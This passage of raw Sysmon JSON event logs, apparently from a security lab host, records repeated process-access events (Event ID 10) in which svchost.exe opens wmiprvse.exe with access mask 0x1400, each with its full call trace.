C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.412","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1055,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.412\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.412","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1056,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.428\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.428","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1057,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.428\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.428","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1058,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.428\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.428","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1059,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1060,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1061,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1062,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 